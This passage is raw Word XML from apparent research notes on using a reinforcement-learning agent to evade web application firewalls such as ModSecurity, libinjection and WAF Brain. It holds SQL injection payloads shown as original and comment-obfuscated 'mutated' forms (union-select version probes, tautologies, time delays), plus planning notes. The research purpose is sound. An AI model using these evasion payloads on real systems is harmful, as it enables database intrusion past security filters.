    <w:p w14:paraId="11B5E15D" w14:textId="77777777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 select |Ol@*/**/from/**/users where/**/id =/**/1 or/**/@`\` union/**/select 1,version (  )  --/**/1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099364D6" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7690141F" w14:textId="4BB65E98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1.&amp;&amp;1 union select 1,version (  )  -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060D3D0" w14:textId="296CEEEB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 select MPnbL*/*X*/from users where/*ul[$x|*/id =/**/1.&amp;&amp;1 union select 1,version/**/(/*G@zJp&lt;[Sj]*/ )  -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA916D" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4399EBA6" w14:textId="77E6E2D8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hi' or 'x' = 'x';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F20C43" w14:textId="224B146C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hi' or/o|i*/x*/'x' =/**/'x';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD085C" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C676BC" w14:textId="6B448C6C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 or $+&lt;1 union select 1,@@VERSION -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C5D573" w14:textId="0575BF75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 select yX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A7DBC" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T@*/union select/*xo*/1,@@VERSION -- 1"**/= 1 or/*!"V!y*/$+&lt;1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D670C8" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B1A08A" w14:textId="0F83F499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 or $ 1 = 1 union select 1,@@VERSION -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168BFF3" w14:textId="28D08718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"/**/select/*GH6*/      PF*/**/from/**/users where id =/*#e*/1 or $/*   `P&lt;#*/1 = 1/**/union select/*u*/1,@@VERSION -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A98A3D2" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD18144" w14:textId="65159418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" select * from users where id = 1 -@&lt;@ union select version (  ) ,version (  )  -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58B63D" w14:textId="147341EA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"/**/select !90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52542643" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>*/**/from users where id/**/=/**/1 -@&lt;@/**/union select version/**/( /**/) ,version (  )  -- 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CCBF5" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3933E4" w14:textId="1E86C0B6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select * from users where id = 1 &lt;@1$ or 1 = 1 -- 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88B360" w14:textId="3A5C9D91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t xml:space="preserve">Mutated </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/**/select U&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5677DD" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>*/**/from/**/users where/*{*/id =/*aUclQ*/1 &lt;@1$ or/**/1 = 1/**/-- 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22413B38" w14:textId="77777777" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B899655" w14:textId="1D6D93E6" w:rsidR="008E4088" w:rsidRPr="008E4088" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve">Original </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>select * from users where id = '1' or !&lt;@ or 1 = 1 -- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36240683" w14:textId="2447FA66" w:rsidR="00EB5B71" w:rsidRDefault="008E4088" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mutated </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4088">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/**/select 5`&gt;#*/**/from/**/users/**/where/**/id = '1'/**/or !&lt;@/**/or/**/1 =/**/1 -- 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785DF3B1" w14:textId="2DAFAD90" w:rsidR="00AC6DCD" w:rsidRDefault="00AC6DCD" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A23AB7" w14:textId="6F37F88E" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="008E4088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--------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA93369" w14:textId="3F261C16" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341042C6" w14:textId="7FB3BEE7" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Results from random agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DB4794" w14:textId="77777777" w:rsidR="00AC6DCD" w:rsidRDefault="00AC6DCD" w:rsidP="008E4088">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1356D5E8" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Original ' having 1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558E2CD" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutated ' having        (SELECT 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E018AD2" w14:textId="10440840" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LIKE 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D7670" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C37648B" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Original ' having 1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419028F" w14:textId="4D2071C4" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutated ' HAvInG (SELECT 1)     = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBAB98" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E840E86" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:strike/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:strike/>
        </w:rPr>
        <w:t>Original 1 waitfor delay '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E1E13" w14:textId="7EC8583A" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:strike/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:strike/>
        </w:rPr>
        <w:t>Mutated 1 WAiTf OR  DELAy '0:0:10'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:strike/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C622E2" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:strike/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034467E4" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Original ' having 1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72525703" w14:textId="2AFE52D4" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutated ' having (SELECT 1) LIKE 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45923F0A" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE10F58" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Original ' having 1 = 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64167A1C" w14:textId="559E8CA2" w:rsidR="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutated '/**/having (SELECT 1) = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857F60A" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D576787" w14:textId="77777777" w:rsidR="004E70E4" w:rsidRPr="004E70E4" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Original or isNULL ( 1/0 )  /*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B327D30" w14:textId="2E01A71F" w:rsidR="0027551D" w:rsidRDefault="004E70E4" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E70E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutated or isNULL ( (SELECT 1)/0 )  /*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107511D4" w14:textId="7639A304" w:rsidR="0083348A" w:rsidRDefault="0083348A" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2FC8B7" w14:textId="7033DC7C" w:rsidR="0083348A" w:rsidRDefault="0083348A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2D596" w14:textId="1471531A" w:rsidR="0083348A" w:rsidRPr="0083348A" w:rsidRDefault="0083348A" w:rsidP="00833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3348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Ignasi:  </w:t>
      </w:r>
      <w:r w:rsidRPr="0083348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>I’m happy to explore the options below discussed in today’s call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53289902" w14:textId="77777777" w:rsidR="0083348A" w:rsidRPr="0083348A" w:rsidRDefault="0083348A" w:rsidP="008334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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>other modsec configs (older versions, etc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782C070" w14:textId="77777777" w:rsidR="0083348A" w:rsidRPr="0083348A" w:rsidRDefault="0083348A" w:rsidP="008334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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>other wafs like wafbrain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D69F2" w14:textId="77777777" w:rsidR="0083348A" w:rsidRPr="0083348A" w:rsidRDefault="0083348A" w:rsidP="008334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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>improve the sql mutator / the feature engineering, whatever you consider could be more successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E703E" w14:textId="198B8DBE" w:rsidR="0083348A" w:rsidRDefault="0083348A" w:rsidP="004E70E4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C980C7" w14:textId="625E0218" w:rsidR="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC7B9C9" w14:textId="77777777" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:t>WAF Evasion Environment for OpenAI Gym</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F34AD" w14:textId="77777777" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EC5E66" w14:textId="111283C1" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>https://github.com/SaneBow/gym-waf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0991724C" w14:textId="0E5547FA" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-&gt; it uses python wrapper for libinjection environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A1698" w14:textId="78B6F285" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>https://github.com/wzhvictor/libinjection-python</w:t>
      </w:r>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B094550" w14:textId="1D82DB12" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>Libinjection Version: v3.10.0(Released on 22 May 2017)</w:t>
      </w:r>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4B3D3" w14:textId="77777777" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>(libinjection code is copied - not referenced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12514BBB" w14:textId="0D0D8108" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2F616" w14:textId="2926B2DC" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Trying older version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAB675E" w14:textId="77777777" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9470F" w14:textId="77777777" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1. get the older version of libinjection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692BF9B" w14:textId="77777777" w:rsidR="00901833" w:rsidRPr="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2. insert the libinjection code in python wrapper and install package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B834E93" w14:textId="0816C876" w:rsidR="00901833" w:rsidRDefault="00901833" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901833">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3. reference the new package in gym-waf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D151056" w14:textId="5C20994B" w:rsidR="00C05653" w:rsidRDefault="00C05653" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A5BB5E" w14:textId="770AB075" w:rsidR="00437AB9" w:rsidRDefault="00437AB9">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70206F1D" w14:textId="5D8CCD8F" w:rsidR="00C05653" w:rsidRDefault="00437AB9" w:rsidP="00B860CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Waf Brain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6E161" w14:textId="6BF13ECC" w:rsidR="00437AB9" w:rsidRDefault="00437AB9" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2102FBFE" w14:textId="6051ADD4" w:rsidR="00437AB9" w:rsidRDefault="00651982" w:rsidP="00901833">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00437AB9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BBVA/waf-brain: Machine Learning WAF Based (github.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="388693CE" w14:textId="1DE10DFF" w:rsidR="00437AB9" w:rsidRDefault="00437AB9" w:rsidP="00901833"/>
    <w:p w14:paraId="5DE2A00A" w14:textId="6B160827" w:rsidR="00437AB9" w:rsidRDefault="008130DF" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A42C979" wp14:editId="573A1A76">
            <wp:extent cx="5731510" cy="1497965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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BC40" w14:textId="09FF5467" w:rsidR="008130DF" w:rsidRDefault="008130DF" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
